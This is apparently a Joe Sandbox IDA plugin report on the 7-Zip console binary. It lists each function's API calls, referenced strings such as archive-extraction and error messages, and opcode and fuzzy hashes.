                              • String ID: Decoding ERROR
                              • API String ID: 169956451-2585761706
                              • Opcode ID: 623189c2735957ce6d47dc01e818d6f3c04ed063bef58c32d71f12519500821d
                              • Instruction ID: 7fba03cfcc54b14e09391f9282e9f6e23776bd7c087bf0af08dca9a253830db2
                              • Opcode Fuzzy Hash: 623189c2735957ce6d47dc01e818d6f3c04ed063bef58c32d71f12519500821d
                              • Instruction Fuzzy Hash: E731C722715ACB82DA70EB22ED927AE7310FBC1BA4F444036CA4D47A55DE3DC846E701
                              APIs
                              • fputs.MSVCRT ref: 00FC149D
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • fputs.MSVCRT ref: 00FC15A4
                              • fputs.MSVCRT ref: 00FC16C0
                              • fputs.MSVCRT ref: 00FC1715
                                • Part of subcall function 00FC0EB4: fputs.MSVCRT ref: 00FC0EDC
                                • Part of subcall function 00FC0EB4: fputs.MSVCRT ref: 00FC0EF0
                                • Part of subcall function 00FC0EB4: free.MSVCRT ref: 00FC0F03
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                              • free.MSVCRT ref: 00FC173F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$fputcmemset
                              • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                              • API String ID: 738794847-24972044
                              • Opcode ID: 63d931e40ab137ac4ad2aaeaa4d4481ac25bc032c224e5a28df5bc161436282c
                              • Instruction ID: cab52d468764597cf7adbe4f96ebaf01c42ccb615e42da882b68bed1f926b1ad
                              • Opcode Fuzzy Hash: 63d931e40ab137ac4ad2aaeaa4d4481ac25bc032c224e5a28df5bc161436282c
                              • Instruction Fuzzy Hash: 83A19266B00AC296CA6CDF35DA927AD7321F786790F18402BDB5E07642CF78D8B4E311
                              APIs
                              • strcmp.MSVCRT ref: 00FCB9EA
                              • fputs.MSVCRT ref: 00FCBA0B
                              • GetTickCount.KERNEL32 ref: 00FCB794
                                • Part of subcall function 00F73798: free.MSVCRT ref: 00F737C4
                                • Part of subcall function 00F73798: memmove.MSVCRT ref: 00F737DF
                                • Part of subcall function 00F73C68: memmove.MSVCRT(00F7B159), ref: 00F73CA7
                                • Part of subcall function 00F73EC0: memmove.MSVCRT ref: 00F73F06
                              • strcmp.MSVCRT ref: 00FCB7DA
                              • wcscmp.MSVCRT ref: 00FCB7FA
                              • strcmp.MSVCRT ref: 00FCB862
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                              • String ID: . $[Content]
                              • API String ID: 591578422-2304726976
                              • Opcode ID: 9094ce9056a28d657d41618d04ec6bfd7be09a4c8be3546634b690409dc7b727
                              • Instruction ID: 69eb95d43804fcb78da14887854278c22083a391e62733c3fdf81d6eb0abbd7a
                              • Opcode Fuzzy Hash: 9094ce9056a28d657d41618d04ec6bfd7be09a4c8be3546634b690409dc7b727
                              • Instruction Fuzzy Hash: 8C814877700642A7CA28DF3ACA82BAC7365F784794F409016DB4D47A10DF38E9B6E701
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmovewcscmp
                              • String ID:
                              • API String ID: 3584677832-0
                              • Opcode ID: 217eeff2f744b3f7c7605ef73134d3b2b6671ebe322cc1af78b4ca430cd740c0
                              • Instruction ID: 7577bdac109f09f6c14ce00ab7b6e0481a330bbf8c8d39b4f5c043f15b7c4313
                              • Opcode Fuzzy Hash: 217eeff2f744b3f7c7605ef73134d3b2b6671ebe322cc1af78b4ca430cd740c0
                              • Instruction Fuzzy Hash: 59417CA2714B4192DB50DF15E89031EB720FBC6BE0F544222EA9E47B68DF7DC946DB10
                              APIs
                              • free.MSVCRT ref: 00FC7CE5
                              • free.MSVCRT ref: 00FC7CEE
                              • free.MSVCRT ref: 00FC7D21
                              • free.MSVCRT ref: 00FC7D2E
                              • free.MSVCRT ref: 00FC7D5A
                              • free.MSVCRT ref: 00FC7D62
                              • free.MSVCRT ref: 00FC7D6A
                              • free.MSVCRT ref: 00FC7D77
                              • free.MSVCRT ref: 00FC7D80
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17B7
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17BF
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17CC
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17F8
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1801
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1809
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1816
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: a2d9f6ed36859aef40b0543bcc9ffb590241e82db697b8cfc55c95f9d211cc78
                              • Instruction ID: 1df4040b10c75953df4181e7e484f5ad53ee7f67e5317766e91925e0a7de49c1
                              • Opcode Fuzzy Hash: a2d9f6ed36859aef40b0543bcc9ffb590241e82db697b8cfc55c95f9d211cc78
                              • Instruction Fuzzy Hash: 8111CD23B05B4985CBA1BF26DD4236C7321EB80FA4F18412A9E0E1B325DF29CC53A350
                              APIs
                              • fputs.MSVCRT ref: 00FC2C2D
                              • fputs.MSVCRT ref: 00FC2C4C
                              • free.MSVCRT ref: 00FC2C65
                              • free.MSVCRT ref: 00FC2C70
                                • Part of subcall function 00F72E68: free.MSVCRT ref: 00F72EA0
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                              • free.MSVCRT ref: 00FC2C7B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$fputs
                              • String ID: =
                              • API String ID: 2444650769-2525689732
                              • Opcode ID: d441028ad3f2f0400f3afa8231183c8378e0facdd0e5135b5b68a102143ceedc
                              • Instruction ID: 648421f900e5d37037ad729baf237f2606c451085e46fd6111d8c757083dc031
                              • Opcode Fuzzy Hash: d441028ad3f2f0400f3afa8231183c8378e0facdd0e5135b5b68a102143ceedc
                              • Instruction Fuzzy Hash: 5521D62320464191CA60EB15E98176E7721F7D5BE0F449227FF5E43A68DF2CC986EB01
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                              • String ID:
                              • API String ID: 352749199-0
                              • Opcode ID: 3bc03dd1b1b73e9071d32506f7fc1c6f2074b6c84ad5a41d6ab94059779c88a3
                              • Instruction ID: a48bfb5d0a2edf92896873bbf98ac228550b4e3a3180b32476ac1b1555c71350
                              • Opcode Fuzzy Hash: 3bc03dd1b1b73e9071d32506f7fc1c6f2074b6c84ad5a41d6ab94059779c88a3
                              • Instruction Fuzzy Hash: 17314F72614787CADB60DF15E991BAD7772F7847A4F40023AE65943AA4CF3CD845EB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                              • String ID:
                              • API String ID: 352749199-0
                              • Opcode ID: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                              • Instruction ID: de1f4e71bc8e52fc1016ad094984e14124259cc2b6fba798a51a3e0d29b88d61
                              • Opcode Fuzzy Hash: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                              • Instruction Fuzzy Hash: A3213931614B87C6EB60DF14E950B6D7772FB847A4F40023AE66943AA4CF3CD845EB00
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 3447f2870b6d53f2272a2c7eb0d0ab99a4122f4f43c70cf63459b61d067e4340
                              • Instruction ID: 65691189a0c36e06b923083a805fe099f525b2878df837d4e9b66c8f6b969193
                              • Opcode Fuzzy Hash: 3447f2870b6d53f2272a2c7eb0d0ab99a4122f4f43c70cf63459b61d067e4340
                              • Instruction Fuzzy Hash: 6D41B133244B4991CB50EF26D85029E7760FB89B98F444022EF4E47728DF3CC9A6EB50
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 34494f8055e4ac842c8fee3ddeb30b0204388ad4d84a894665da7a39221f3768
                              • Instruction ID: 7f0fca5d3a3edf0ee82fa6f58c5bf326bd4e55d1f884fd208f42cfeb713c0975
                              • Opcode Fuzzy Hash: 34494f8055e4ac842c8fee3ddeb30b0204388ad4d84a894665da7a39221f3768
                              • Instruction Fuzzy Hash: C741BB6222858552CB60EB24EC5179EB360FBD57E4F809223F6DE875B9DF2CC506DB01
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 6090aba66b1dc48e1abda49c94261c98d8ff034174972193e8d4cf115a61bc83
                              • Instruction ID: f8b55973d31853a128a2ef2e0153e93bdc59fc864c484985fa3a6189a0b0496b
                              • Opcode Fuzzy Hash: 6090aba66b1dc48e1abda49c94261c98d8ff034174972193e8d4cf115a61bc83
                              • Instruction Fuzzy Hash: 7A118627740B49869F60BE22D95106D3310EB55BF4B4C8622EF2D1B790DF19C8729360
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: caaeff056fdabb2c2e7321f671ea6a354ebf0e5937cb7c37bed008342a00664b
                              • Instruction ID: 649e59e362da86cabc9f1cc4066ce090241d3b1ac5e8b685ff777415bfc27f81
                              • Opcode Fuzzy Hash: caaeff056fdabb2c2e7321f671ea6a354ebf0e5937cb7c37bed008342a00664b
                              • Instruction Fuzzy Hash: 7101E167B01A84898BA1EE26CC1002C2321EB82FF4F2E4226DE1D1F388DF29CC52D350
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 7fbbcc2e99cb0114e1a3119e233bbbd991d18d9e1ce76fad5144490d7254e9df
                              • Instruction ID: f84a91b437060e50710401ecf261dd99f44cc14c6258d510eea55cae76c5bbfd
                              • Opcode Fuzzy Hash: 7fbbcc2e99cb0114e1a3119e233bbbd991d18d9e1ce76fad5144490d7254e9df
                              • Instruction Fuzzy Hash: 7311DB22301B4585DF94EF35C8A122C7320FBC5FA8B5586229E2E5B665CF29CC5AD391
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 22a96e9d9d4722407fb0a5c82a3c95a0bc4945a29bd40f847b14d035822603d1
                              • Instruction ID: d16804aa0f12edb1a13db31c4d6817fd0d3dc109803b0909294478f761f393d7
                              • Opcode Fuzzy Hash: 22a96e9d9d4722407fb0a5c82a3c95a0bc4945a29bd40f847b14d035822603d1
                              • Instruction Fuzzy Hash: 2A514F63200A4591CF50EF25D8916AD3361F7C5F94FA09513DA0E87728DF7CC99AEB42
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 757d814618d8855f7859b7308ee0aa145b0e50a47704a47a6e8009e6b379919c
                              • Instruction ID: cc6c4de668a34babed97bac841b906bd79597a748fb583ff1e46702261fd088c
                              • Opcode Fuzzy Hash: 757d814618d8855f7859b7308ee0aa145b0e50a47704a47a6e8009e6b379919c
                              • Instruction Fuzzy Hash: 03217C27B02B4585CB29EF35D95172D7720EB85FA4F29822ADE2D1B798CF39C8019310
                              APIs
                              • fputs.MSVCRT ref: 00FC0D6D
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Strings
                              Similarity
                              • API ID: fputs$memset
                              • String ID: Extracting archive: $Open$Testing archive:
                              • API String ID: 3543874852-295398807
                              • Opcode ID: 18c3264e37cd08eff7b5bc60e9fc1ea2811d52f6f279732d5a37a01967141fb5
                              • Instruction ID: 272606a8e6186691ac371d7dad9e2cef4c6bf83fe0911201bc9fd4a195361027
                              • Opcode Fuzzy Hash: 18c3264e37cd08eff7b5bc60e9fc1ea2811d52f6f279732d5a37a01967141fb5
                              • Instruction Fuzzy Hash: F4116022702A8784DB95DB69DD857F82361E755F98F1884378E0D4A255DE2984CBE310
                              APIs
                              • fputs.MSVCRT ref: 00FC2AF3
                              • fputs.MSVCRT ref: 00FC2B03
                              • free.MSVCRT ref: 00FC2B50
                                • Part of subcall function 00FC29A8: fputs.MSVCRT ref: 00FC29ED
                                • Part of subcall function 00FC29A8: fputs.MSVCRT ref: 00FC2A7B
                                • Part of subcall function 00FC29A8: free.MSVCRT ref: 00FC2AAB
                              Strings
                              Similarity
                              • API ID: fputs$free
                              • String ID: =
                              • API String ID: 3873070119-2525689732
                              • Opcode ID: 7f5f4739c8a74bee139a7b4d1d7c537d8cc3c3030b42f5feef9f930dadc4e1fa
                              • Instruction ID: 9d03b9cdd9ef35872536a9aab07826eeda9d8b5cf3ca674fb1cda4a153b95303
                              • Opcode Fuzzy Hash: 7f5f4739c8a74bee139a7b4d1d7c537d8cc3c3030b42f5feef9f930dadc4e1fa
                              • Instruction Fuzzy Hash: 5DF0D69230460151DA60EB26EE517793322DBC5FF4F089223AD6D07BE8DE2CC946A702
                              APIs
                              • free.MSVCRT ref: 00F889D7
                                • Part of subcall function 00F864E8: free.MSVCRT ref: 00F865C5
                                • Part of subcall function 00F86E88: GetLastError.KERNEL32 ref: 00F86EA3
                                • Part of subcall function 00F86E88: free.MSVCRT ref: 00F86EF4
                                • Part of subcall function 00F86E88: free.MSVCRT ref: 00F86F2D
                              Strings
                              Similarity
                              • API ID: free$ErrorLast
                              • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                              • API String ID: 408039514-394804653
                              • Opcode ID: 88ec8297f9e23e0ec126f7f7c0500b9844928d1bdfebefa7bf21fb12f3e5a416
                              • Instruction ID: 0130d5a202738daef4bbb9cebb466ae60459626e512a1588e1490599532cdb4f
                              • Opcode Fuzzy Hash: 88ec8297f9e23e0ec126f7f7c0500b9844928d1bdfebefa7bf21fb12f3e5a416
                              • Instruction Fuzzy Hash: 5341B02720578594DB61AF3598113FE2721A785FE8F8C4132CF8A4B355DF78C94AE3A1
                              APIs
                              Strings
                              • doc dot wbk docx docm dotx dotm docb wll wwl xls xlt xlm xlsx xlsm xltx xltm xlsb xla xlam ppt pot pps ppa ppam pptx pptm potx potm ppam ppsx ppsm sldx sldm , xrefs: 00F879C6
                              • :Zone.Identifier, xrefs: 00F879DD
                              • Cannot set length for output file, xrefs: 00F8797F
                              Similarity
                              • API ID: free
                              • String ID: doc dot wbk docx docm dotx dotm docb wll wwl xls xlt xlm xlsx xlsm xltx xltm xlsb xla xlam ppt pot pps ppa ppam pptx pptm potx potm ppam ppsx ppsm sldx sldm $:Zone.Identifier$Cannot set length for output file
                              • API String ID: 1294909896-1552544479
                              • Opcode ID: 95d128e0864b841a27fa4d131d8ed5442c0accbf7f060dd31cc92dc6e18bbb30
                              • Instruction ID: ede5d878a3cd5cf020a4a3f20a15ef4d7e2aa636e84a407b4799bba75456fbc0
                              • Opcode Fuzzy Hash: 95d128e0864b841a27fa4d131d8ed5442c0accbf7f060dd31cc92dc6e18bbb30
                              • Instruction Fuzzy Hash: 6941A1326087C181DF61EF35D8403ED6721E781BA8F585272EAAD4B6AADE2CC54AD710
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 70d3439854e7706087ba43be2736c122568b0a749180fca4c848fbc153217cb3
                              • Instruction ID: ee951db0c70c4d0836d3a7a1f6a936a23b8b0df46bd0f3fbf47813c2b441338d
                              • Opcode Fuzzy Hash: 70d3439854e7706087ba43be2736c122568b0a749180fca4c848fbc153217cb3
                              • Instruction Fuzzy Hash: 83311A72514B47C6D760DF14E990B697771F7817A4F40423AE65943AA4DF3CD845EB00
                              APIs
                              Similarity
                              • API ID: AttributesFilefree
                              • String ID:
                              • API String ID: 1936811914-0
                              • Opcode ID: 2438c4d46c2d3bedd8f8d32da497e8a1ec4bb712b86c7c0aadf2914d42ad0083
                              • Instruction ID: 48f8875936fc4137d3fa98734ba7011d3fae78b8645978843dafbfde7ab05628
                              • Opcode Fuzzy Hash: 2438c4d46c2d3bedd8f8d32da497e8a1ec4bb712b86c7c0aadf2914d42ad0083
                              • Instruction Fuzzy Hash: 8101A72371874141DA30AB21989037E13649BC67F4F588323EE6D876A5DF2DCD86F702
                              APIs
                              Similarity
                              • API ID: AttributesFilefree
                              • String ID:
                              • API String ID: 1936811914-0
                              • Opcode ID: f3a7bfe2fbeb8eaaa86e59d7df9951e83bc08cde47471fedabe96c3adb9c62b3
                              • Instruction ID: 79bc9fa4cf652b3260b1c768ac105ab2ae7fdd84cfa04d0481ce42b124cd32be
                              • Opcode Fuzzy Hash: f3a7bfe2fbeb8eaaa86e59d7df9951e83bc08cde47471fedabe96c3adb9c62b3
                              • Instruction Fuzzy Hash: 59F0A92264464545C530A734ADD832D2321A7867F4F648322EA7E8B7E4DF1CCD47E702
                              APIs
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: 3d4e3d313a12ffc0cbc2ef8ed08529013286d5a7e115bc917af8f605999ee648
                              • Instruction ID: 9a82e5081bdab631b2f5109976b624be36b148adbc66b6be70cb05aa4c672f62
                              • Opcode Fuzzy Hash: 3d4e3d313a12ffc0cbc2ef8ed08529013286d5a7e115bc917af8f605999ee648
                              • Instruction Fuzzy Hash: AC518E72704A8097DE30EB16E88029D7320F789BE4F448227DB8D47B59DF38D4A5DB40
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 6e3fada83e1e8ae34f328cb636aa625eae3db3a74b5cde4ffc27f04f2bbbb36f
                              • Instruction ID: abd263f89640fa3bf39cf5315c540d773797393807ed69b581102c98fc49aa73
                              • Opcode Fuzzy Hash: 6e3fada83e1e8ae34f328cb636aa625eae3db3a74b5cde4ffc27f04f2bbbb36f
                              • Instruction Fuzzy Hash: AC11D36360468490DF20EB21E84556E7331E7C2BF5F88C212EE5D0B6A5DF6CC98AE702
                              APIs
                                • Part of subcall function 00F7960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 00F7961E
                              • CreateFileW.KERNELBASE ref: 00F79B09
                              • CreateFileW.KERNEL32 ref: 00F79B5C
                              • free.MSVCRT ref: 00F79B6A
                              Similarity
                              • API ID: CreateFile$CloseHandlefree
                              • String ID:
                              • API String ID: 210839660-0
                              APIs
                                • Part of subcall function 00F735B8: memmove.MSVCRT ref: 00F735F0
                              • fputs.MSVCRT ref: 00FC29ED
                              • fputs.MSVCRT ref: 00FC2A7B
                              • free.MSVCRT ref: 00FC2AAB
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              Similarity
                              • API ID: fputs$fputcfreememmove
                              • String ID:
                              • API String ID: 1158454270-0
                              APIs
                              • SetFilePointer.KERNELBASE(00000003,00000000,00000000,?,00F79BD5), ref: 00F79736
                              • GetLastError.KERNEL32 ref: 00F79743
                              • SetLastError.KERNEL32 ref: 00F7975C
                              Similarity
                              • API ID: ErrorLast$FilePointer
                              • String ID:
                              • API String ID: 1156039329-0
                              APIs
                              Similarity
                              • API ID: free$fputsmemmove
                              • String ID:
                              • API String ID: 4106585527-0
                              APIs
                              Similarity
                              • API ID: free$fputsmemmove
                              • String ID:
                              • API String ID: 4106585527-0
                              APIs
                              Similarity
                              • API ID: ErrorLast$memmove
                              • String ID:
                              • API String ID: 3796167841-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              Strings
                              Similarity
                              • API ID: fputc
                              • String ID: Kernel
                              • API String ID: 1992160199-1736990243
                              APIs
                              • memset.MSVCRT ref: 00FCB515
                              • fputs.MSVCRT ref: 00FCB53A
                                • Part of subcall function 00F72C70: _CxxThrowException.MSVCRT ref: 00F72C99
                                • Part of subcall function 00F72C70: free.MSVCRT ref: 00F72CB1
                              Similarity
                              • API ID: ExceptionThrowfputsfreememset
                              • String ID:
                              • API String ID: 3104931167-0
                              APIs
                              Similarity
                              • API ID: fputcfputsfree
                              • String ID:
                              • API String ID: 2822829076-0
                              APIs
                              • memmove.MSVCRT ref: 00FB33B2
                              • memmove.MSVCRT ref: 00FB33EC
                                • Part of subcall function 00F73798: free.MSVCRT ref: 00F737C4
                                • Part of subcall function 00F73798: memmove.MSVCRT ref: 00F737DF
                                • Part of subcall function 00FB5A44: _CxxThrowException.MSVCRT ref: 00FB5A74
                                • Part of subcall function 00FB5A44: memmove.MSVCRT ref: 00FB5AAD
                                • Part of subcall function 00FB5A44: free.MSVCRT ref: 00FB5AB5
                                • Part of subcall function 00F72350: malloc.MSVCRT ref: 00F72360
                                • Part of subcall function 00F72350: _CxxThrowException.MSVCRT ref: 00F7237B
                              Similarity
                              • API ID: memmove$ExceptionThrowfree$malloc
                              • String ID:
                              • API String ID: 459785443-0
                              APIs
                              • memmove.MSVCRT ref: 00FB33CA
                              • memmove.MSVCRT ref: 00FB33EC
                                • Part of subcall function 00F73798: free.MSVCRT ref: 00F737C4
                                • Part of subcall function 00F73798: memmove.MSVCRT ref: 00F737DF
                                • Part of subcall function 00FB5A44: _CxxThrowException.MSVCRT ref: 00FB5A74
                                • Part of subcall function 00FB5A44: memmove.MSVCRT ref: 00FB5AAD
                                • Part of subcall function 00FB5A44: free.MSVCRT ref: 00FB5AB5
                                • Part of subcall function 00F72350: malloc.MSVCRT ref: 00F72360
                                • Part of subcall function 00F72350: _CxxThrowException.MSVCRT ref: 00F7237B
                              Similarity
                              • API ID: memmove$ExceptionThrowfree$malloc
                              • String ID:
                              • API String ID: 459785443-0
                              APIs
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC02F0
                              • LeaveCriticalSection.KERNEL32 ref: 00FC032C
                              Similarity
                              • API ID: CriticalSection$EnterLeave
                              • String ID:
                              • API String ID: 3168844106-0
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC0298
                              • LeaveCriticalSection.KERNEL32 ref: 00FC02CC
                                • Part of subcall function 00FCB774: GetTickCount.KERNEL32 ref: 00FCB794
                                • Part of subcall function 00FCB774: strcmp.MSVCRT ref: 00FCB7DA
                                • Part of subcall function 00FCB774: wcscmp.MSVCRT ref: 00FCB7FA
                                • Part of subcall function 00FCB774: strcmp.MSVCRT ref: 00FCB862
                              Similarity
                              • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                              • String ID:
                              • API String ID: 3267814326-0
                              APIs
                              Similarity
                              • API ID: ExceptionThrowmalloc
                              • String ID:
                              • API String ID: 2436765578-0
                              APIs
                                • Part of subcall function 00F7BE6C: VariantClear.OLEAUT32 ref: 00F7BE91
                              • free.MSVCRT ref: 00F8BBE1
                              Similarity
                              • API ID: ClearVariantfree
                              • String ID:
                              • API String ID: 1064583652-0
                              • Opcode ID: 76b4d2c4a1afcce3459ea70e00dd02e281554d3da1415d3bd68a28633409dc01
                              • Instruction ID: 19797413c112d47d60017d838d261a89a256f62ad02035dc162706b05a1f69b3
                              • Opcode Fuzzy Hash: 76b4d2c4a1afcce3459ea70e00dd02e281554d3da1415d3bd68a28633409dc01
                              • Instruction Fuzzy Hash: B0125733608BC086CB75EB25E4902EEB761F395B90F684116DBDB47B24DBB9D884E701
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8e1cdfd6a4b5c65e5f858a886ff12511c44938c6720d31dbf4f1bc7184a9a63f
                              • Instruction ID: ba99844db198cfed76ab98d4ffcb9548dab0831a0faa976927c92284f637fe84
                              • Opcode Fuzzy Hash: 8e1cdfd6a4b5c65e5f858a886ff12511c44938c6720d31dbf4f1bc7184a9a63f
                              • Instruction Fuzzy Hash: 31515AB2605AC496C761DF29D8442DE3B62F385FD8FA84136DE8A4B719DF35C882D310
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
